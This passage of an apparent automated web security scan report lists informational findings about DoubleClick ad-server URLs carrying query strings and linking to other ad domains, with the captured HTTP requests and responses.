Expires: Mon, 13 Jun 2011 11:21:51 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 635
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IFRAME width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" src="http://tags.bluekai.com/site/2565?ret=html&phint=u1=Hotel&phint=u2=178293&phint=u4=20110714%7C20110718&phint=u6=1&phint=u7=2%7C0&phint=u9=Millenium%20Hilton&phint=u11=40&phint=u13=892034&phint=u14=215.2&phint=u15="></IFRAME><script type="text/javascript"
src="http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js">
</script>
...[SNIP]...

18.112. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=1498390;type=mtvre912;cat=remot936;ord=4072029369417.578?

The response contains the following links to other domains:

http://ads.revsci.net/adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=352F6F25662BEFFD9FC43D7CA86B17EA&rsi_site=355F4CD2118A64AD05C45CD6729FBFD6&rsi_event=A76C14792A2CEEA402DDAC3A35E3B552
http://bp.specificclick.net/?pixid=99002135
http://media.adrevolver.com/adrevolver/trace?adpath=7914
http://media.fastclick.net/w/tre?ad_id=18356&evt=69&cat1=56&cat2=74
http://switch.atdmt.com/action/ampmtv_GossipShows_1

Request

GET /activityi;src=1498390;type=mtvre912;cat=remot936;ord=4072029369417.578? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 13 Jun 2011 11:18:16 GMT
Expires: Mon, 13 Jun 2011 11:18:16 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 790
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent">
<img src="http://ads.revsci.net/adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=352F6F25662BEFFD9FC43D7CA86B17EA&rsi_site=355F4CD2118A64AD05C45CD6729FBFD6&rsi_event=A76C14792A2CEEA402DDAC3A35E3B552"/>
<img src="http://switch.atdmt.com/action/ampmtv_GossipShows_1" height="1" width="1">
<img width="0" height="0" border="0" src="http://media.adrevolver.com/adrevolver/trace?adpath=7914">
<IMG SRC="http://bp.specificclick.net?pixid=99002135" width=0 height=0 border=0><img src="http://media.fastclick.net/w/tre?ad_id=18356&evt=69&cat1=56&cat2=74" width="1" height="1" border="0"></body>
...[SNIP]...

18.113. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=nausi164;u=F398C033545B4D3D89FE3B1CF839F8D4;u16=USD;u13=892034;u14=215.2;u11=40;u9=Millenium%20Hilton;u7=2%7C0;u6=1;u4=20110714%7C20110718;u1=Hotel;u2=178293;ord=8825947351288.05?

The response contains the following links to other domains:

http://admonkey.dapper.net/PixelMonkey?adId=expedia&format=image&tp=111222118&&useReferrer=1&type=info
http://content1.admonkey.dapper.net/clients/expedia/Infosite_US.html

Request

GET /activityi;src=2588783;type=nausc547;cat=nausi164;u=F398C033545B4D3D89FE3B1CF839F8D4;u16=USD;u13=892034;u14=215.2;u11=40;u9=Millenium%20Hilton;u7=2%7C0;u6=1;u4=20110714%7C20110718;u1=Hotel;u2=178293;ord=8825947351288.05? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 13 Jun 2011 11:21:51 GMT
Expires: Mon, 13 Jun 2011 11:21:51 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 502
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent">
<img src="http://admonkey.dapper.net/PixelMonkey?adId=expedia&format=image&tp=111222118&&useReferrer=1&type=info" width="1" height="1" alt=""/>
<iframe width="0" height="0" frameborder="0" src="http://content1.admonkey.dapper.net/clients/expedia/Infosite_US.html"></iframe>
...[SNIP]...

18.114. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307985396&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395244&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307967395282&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=17&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=1109&xpc=Opu8f4wccI&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110601/r20110607/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dwww.terremark.com/%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGzuem3IaFVguP-ogrsdVygTfdoyQ

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307985396&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395244&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307967395282&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=17&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=1109&xpc=Opu8f4wccI&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.115. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307984167&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966165620&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307966165257&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1510796261&ga_fc=1&u_tz=-300&u_his=13&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=1770&xpc=V8625tKlN9&p=http%3A//www.twackle.com

The response contains the following link to another domain:

http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQAGYE3dcKYhH_ayDGovBdy_Y-vVNAAAAAIwuAAC1AAAAlgIAAAIAAACMcAYA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gANAYBAgUCAQQAAAAABR5FZQAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+18582%2C+1307966168%29%3Buf%28%27c%27%2C+84055%2C+1307966168%29%3Buf%28%27r%27%2C+422028%2C+1307966168%29%3B&cnd=!uBwF1AjXkAUQjOEZGAAg0ccBMAA4sxZAAEiWBVAAWABgVWgAcAB4AIABAIgBAJABAZgBAaABA6gBA7ABAbkBmZmZBdcjE0DBAZmZmQXXIxNAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!3ASnJwjXkAUQjOEZGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfX62AABC20K5XFIkvFx4HE2g1niV-6tbeun4A&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjqR22Pr1Te2WBMjilQfg48WXCdfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmAL4BcACBMgChdLPCqgDAegDiALoA7UI9QMAAADEgAbFraj6l4H1vDQ%26num%3D1%26sig%3DAGiWqtzg1K0ys-dZ_vtnOBuByoLCRz8ULQ%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307984167&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966165620&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307966165257&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1510796261&ga_fc=1&u_tz=-300&u_his=13&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=1770&xpc=V8625tKlN9&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.116. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307983246&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965246021&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307965246064&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=164146876&ga_fc=1&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=97&xpc=W1abE2ETg7&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://s0.2mdn.net/2757332/FathersDay_728x90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dsamsclub.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHvLkq8PgA6ijSXmI436MWcdZspSA

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307983246&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307965246021&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307965246064&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=164146876&ga_fc=1&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=97&xpc=W1abE2ETg7&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.117. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9299107390287692&output=html&h=60&slotname=2685076242&w=468&lmt=1307980826&flash=10.3.181&url=http%3A%2F%2Fwww.tvfanatic.com%2F2011%2F06%2Fgame-of-thrones-review-baelor%2F&dt=1307963904392&bpp=4&shv=r20110608&jsv=r20110607&correlator=1307963904674&frm=4&adk=188174003&ga_vid=1701260498.1307963905&ga_sid=1307963905&ga_hid=1568992620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&fu=0&ifi=1&dtd=335&xpc=ohHXSKdHOB&p=http%3A//www.tvfanatic.com

The response contains the following link to another domain:

http://ib.adnxs.com/ab?enc=hetRuB6FCUCF61G4HoUJQAAAAKCZmQFAhetRuB6FCUCF61G4HoUJQGQMRy2By9Rn_ayDGovBdy8X8_VNAAAAAEUhAAC1AAAANQEAAAIAAABmowUA0WMAAAEAAABVU0QAVVNEANQBPADPCmYAzg4BAgUCAQQAAAAAQCJJ8wAAAAA.&tt_code=vert-22&udj=uf%28%27a%27%2C+15288%2C+1307964183%29%3Buf%28%27r%27%2C+369510%2C+1307964183%29%3Bppv%2811776%2C+%277481828636640087140%27%2C+1307964183%2C+1310556183%2C+62058%2C+25553%29%3B&cnd=!8x6Kdgjq5AMQ5sYWGAAg0ccBMAA4zxVAAEi1AlAAWABgVWgAcAB4AIABqAGIAQSQAQGYAQGgAQOoAQOwAQG5AZmZmcEehQlAwQGZmZnBHoUJQMkBMzMzMzMz9z_QAQDZAQAAAAAAAPA_4AEA&ccd=!fQW1Lgjq5AMQ5sYWGNHHASAA&referrer=http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/&pp=TfXzFwAHvNIK5WhLn1JwNrEb3Vc0Mn7hd51A_w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBHBubF_P1TdL5HsvQlQe24Mn6Ce_675oCp537xBqL-vP9CAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi05Mjk5MTA3MzkwMjg3NjkysgERd3d3LnR2ZmFuYXRpYy5jb226AQk0Njh4NjBfYXPIAQnaAT9odHRwOi8vd3d3LnR2ZmFuYXRpYy5jb20vMjAxMS8wNi9nYW1lLW9mLXRocm9uZXMtcmV2aWV3LWJhZWxvci-YAqoGwAIEyAKrgqUOqAMB6AMW6AOkBfUDAAAARIAGwIvsgYexoIw1%26num%3D1%26sig%3DAGiWqtyqO1BpEtqHjULBlEfkHiwLMq6NTQ%26client%3Dca-pub-9299107390287692%26adurl%3D

Request

GET /pagead/ads?client=ca-pub-9299107390287692&output=html&h=60&slotname=2685076242&w=468&lmt=1307980826&flash=10.3.181&url=http%3A%2F%2Fwww.tvfanatic.com%2F2011%2F06%2Fgame-of-thrones-review-baelor%2F&dt=1307963904392&bpp=4&shv=r20110608&jsv=r20110607&correlator=1307963904674&frm=4&adk=188174003&ga_vid=1701260498.1307963905&ga_sid=1307963905&ga_hid=1568992620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&fu=0&ifi=1&dtd=335&xpc=ohHXSKdHOB&p=http%3A//www.tvfanatic.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 11:23:03 GMT
Server: cafe
Cache-Control: private
Content-Length: 1804
X-XSS-Protection: 1; mode=block
Expires: Mon, 13 Jun 2011 11:23:03 GMT

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=hetRuB6FCUCF61G4HoUJQAAAAKCZmQFAhetRuB6FCUCF61G4HoUJQGQMRy2By9Rn_ayDGovBdy8X8_VNAAAAAEUhAAC1AAAANQEAAAIAAABmowUA0WMAAAEAAABVU0QAVVNEANQBPADPCmYAzg4BAgUCAQQAAAAAQCJJ8wAAAAA.&tt_code=vert-22&udj=uf%28%27a%27%2C+15288%2C+1307964183%29%3Buf%28%27r%27%2C+369510%2C+1307964183%29%3Bppv%2811776%2C+%277481828636640087140%27%2C+1307964183%2C+1310556183%2C+62058%2C+25553%29%3B&cnd=!8x6Kdgjq5AMQ5sYWGAAg0ccBMAA4zxVAAEi1AlAAWABgVWgAcAB4AIABqAGIAQSQAQGYAQGgAQOoAQOwAQG5AZmZmcEehQlAwQGZmZnBHoUJQMkBMzMzMzMz9z_QAQDZAQAAAAAAAPA_4AEA&ccd=!fQW1Lgjq5AMQ5sYWGNHHASAA&referrer=http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/&pp=TfXzFwAHvNIK5WhLn1JwNrEb3Vc0Mn7hd51A_w&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBHBubF_P1TdL5HsvQlQe24Mn6Ce_675oCp537xBqL-vP9CAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi05Mjk5MTA3MzkwMjg3NjkysgERd3d3LnR2ZmFuYXRpYy5jb226AQk0Njh4NjBfYXPIAQnaAT9odHRwOi8vd3d3LnR2ZmFuYXRpYy5jb20vMjAxMS8wNi9nYW1lLW9mLXRocm9uZXMtcmV2aWV3LWJhZWxvci-YAqoGwAIEyAKrgqUOqAMB6AMW6AOkBfUDAAAARIAGwIvsgYexoIw1%26num%3D1%26sig%3DAGiWqtyqO1BpEtqHjULBlEfkHiwLMq6NTQ%26client%3Dca-pub-9299107390287692%26adurl%3D"></script>
...[SNIP]...

18.118. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307986011&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307968011477&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307968011518&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=2003356553&ga_fc=1&u_tz=-300&u_his=18&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=84&xpc=HAiaBvzDFh&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3DMyLocalComcast.com%26adT%3DXFINITY%25C2%25AE%2BTriple%2BPlay%26adU%3Dwww.Replicon.com/Free_Trial%26adT%3DWeb%2BTimesheet%2BSoftware%26adU%3Dwww.Dovico.com%26adT%3DOnline%2BTimesheet%2BTracking%26gl%3DUS&usg=AFQjCNHkvt8j2E2eAWfBtJekiyCg2ETAMw

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307986011&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307968011477&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307968011518&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=2003356553&ga_fc=1&u_tz=-300&u_his=18&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=84&xpc=HAiaBvzDFh&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.119. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307984165&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966165219&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307966165257&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1510796261&ga_fc=1&u_tz=-300&u_his=12&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=124&xpc=7DG1hSMJ3a&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3DMyLocalComcast.com%26adT%3DComcast%25C2%25AE%2BLocal%2BCable%26adU%3Dwww.FitTrackingSolutions.com%26adT%3DTrack%2BYour%2BAction%2BItems%26adU%3Dwww.DIRECTVCommercial.com/bar%2526%252339%253Bs%26adT%3DDIRECTV%25C2%25AE%2BFor%2BBar%2526%252339%253Bs%26gl%3DUS&usg=AFQjCNGOuXF3mATmtdYajy-ryq7_3J7ddw

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307984165&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966165219&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307966165257&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1510796261&ga_fc=1&u_tz=-300&u_his=12&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=124&xpc=7DG1hSMJ3a&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
